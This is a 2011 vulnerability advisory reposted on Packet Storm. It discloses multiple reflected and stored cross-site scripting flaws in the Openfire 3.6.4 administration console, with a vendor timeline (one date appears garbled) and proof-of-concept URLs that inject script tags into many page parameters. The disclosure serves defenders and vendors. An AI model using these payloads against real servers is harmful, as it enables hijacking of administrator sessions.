Openfire 3.6.4 Cross Site Scripting

2011-01-05T00:00:00
ID PACKETSTORM:97270
Type packetstorm
Reporter Riyaz Walikar
Modified 2011-01-05T00:00:00

Description

                                        
                                            `Hi,  
  
This is regarding multiple XSS Vulnerabilities in Openfire 3.6.4  
Administrative Section. The following is the disclosure document:  
  
Title: Multiple XSS Vulnerabilities in Openfire 3.6.4 Administrative  
Section  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
--  
  
Project: Openfire  
Severity: High  
Versions: 3.6.4 (other versions may be affected)  
Exploit type: Multiple XSS  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
--  
  
Timeline:  
14 October 2010: Vendor Contacted  
15 October 2010: Vendor Response received. Asks to verify the issues in  
beta.  
28 October 2010: Informed Vendor that multiple pages are still  
vulnerable  
03 November 2010: Acknowledgement / Update requested  
03 November 2010: Update received. No fixes initiated.  
23 November 2010: Informed vendor disclosure date set to 1/12/2010  
22 December 2010: Update requested.  
22 December 2010: Vendor asks to release information as the  
vulnerabilities are already known  
23 December 2010: A different contact at the Vendor location informs  
that there are no updates.  
24 December 2010: Disclosure date set to 5 December 2010  
05 December 2010: Public disclosure.  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
--  
  
Product Description:  
Openfire is a real time collaboration (RTC) server licensed under the  
Open Source GPL. It uses the only widely adopted open protocol for  
instant messaging, XMPP (also called Jabber). Openfire is incredibly  
easy to setup and administer, but offers rock-solid security and  
performance.  
(Source: http://www.igniterealtime.org/projects/openfire/)  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
--  
  
Affected Files/Locations/Modules:  
login.jsp  
security-audit-viewer.jsp  
user-create.jsp  
plugins/search/advance-user-search.jsp  
user-roster-add.jsp  
user-roster.jsp  
group-create.jsp  
group-edit.jsp  
group-delete.jsp  
muc-room-edit-form.jsp  
muc-room-delete.jsp  
plugins/clientcontrol/create-bookmark.jsp  
plugins/clientcontrol/spark-form.jsp  
  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
--  
  
Vulnerability Details:  
User can insert HTML or execute arbitrary JavaScript code within the  
vulnerable application. The vulnerabilities arise due to insufficient  
input validation in multiple input fields throughout the application.  
Successful exploitation of these vulnerabilities could result in, but  
not limited to, compromise of the application, theft of cookie-based  
authentication credentials, arbitrary page redirection, disclosure or  
modification of sensitive data and phishing attacks.  
  
Since the vulnerabilities exist in the administrative module, a  
successful attack could cause a complete compromise of the entire  
application. An attacker can send a link with the exploit to an  
administrator whose access could compromise the application.  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
--  
  
Proof of Concept:  
Persistent XSS:  
http://localhost:9090/login.jsp?url=&username=test"  
onfocus=javascript:window.location.assign('http://www.google.com');">  
  
http://localhost:9090/login.jsp?url=hello"  
onfocus=javascript:window.location.assign('http://www.google.com');">  
  
http://localhost:9090/security-audit-viewer.jsp?range=15&username="><scr  
ipt>alert('xss')</script>&search=Search  
  
http://localhost:9090/user-create.jsp?username=test"><script>alert('xss'  
)</script>  
http://localhost:9090/user-create.jsp?name=test"><script>alert('xss')</s  
cript>  
http://localhost:9090/user-create.jsp?email=test"><script>alert('xss')</  
script>  
  
http://localhost:9090/plugins/search/advance-user-search.jsp?criteria=te  
st"><script>alert('xss')</script>  
  
http://localhost:9090/user-roster-add.jsp?username=test<script>alert('xs  
s')</script>  
http://localhost:9090/user-roster-add.jsp?username=user&jid=1&nickname=<  
script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add  
+Item  
  
http://localhost:9090/user-roster.jsp?username=test<script>alert(documen  
t.cookie)</script>  
http://localhost:9090/user-lockout.jsp?username=test<script>alert('xss')  
</script>  
  
http://localhost:9090/group-create.jsp?name=test<script>alert('xss')</sc  
ript>&description=<script>alert('xss')</script>&create=Create+Group  
  
http://localhost:9090/group-edit.jsp?creategroupsuccess=true&group=test<  
script>alert('xss')</script>  
  
http://localhost:9090/group-delete.jsp?group=<script>alert('xss')</scrip  
t>  
  
  
http://localhost:9090/muc-room-edit-form.jsp?save=true&create="><script>  
alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</  
script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert  
('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_  
topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert(  
'XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</scrip  
t>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roo  
mconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfi  
g_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><s  
cript>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('X  
SS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&  
roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_  
registration=true"><script>alert('XSS')</script>&Submit=Save+Changes  
  
http://localhost:9090/muc-room-delete.jsp?roomJID="><script>alert('XSS')  
</script>&create=false  
  
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?urlName=  
"><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&user  
s="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>  
&rss=off&createURLBookmark=Create&type=url  
  
http://localhost:9090/plugins/clientcontrol/spark-form.jsp?optionalMessa  
ge=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions  
  
  
Stored XSS:  
http://localhost:9090/group-create.jsp  
http://localhost:9090/group-summary.jsp  
Method: Navigate to http://localhost:9090/group-create.jsp, and create a  
new group with the following details.  
Group Name: Test<script>alert("xss")</script>  
Description: Test<script>alert("xss")</script> Click on Create Group,  
you will be greeted with multiple alert boxes. Click on Group Summary  
from the left pane or navigate to  
http://localhost:9090/group-summary.jsp to be greeted again by multiple  
alert boxes completing the PoC.  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
--  
  
Warm Regards,  
Riyaz Ahemed Walikar || Senior Engineer - Professional Services  
Vulnerability Assessment & Penetration Testing  
Microland Limited  
www.microland.com  
  
  
The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material.   
Any review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this information by persons or entities other than the intended recipient is prohibited.   
If you received this in error, please contact the sender and delete the material from your computer.   
Microland takes all reasonable steps to ensure that its electronic communications are free from viruses.   
However, given Internet accessibility, the Company cannot accept liability for any virus introduced by this e-mail or any attachment and you are advised to use up-to-date virus checking software.   
`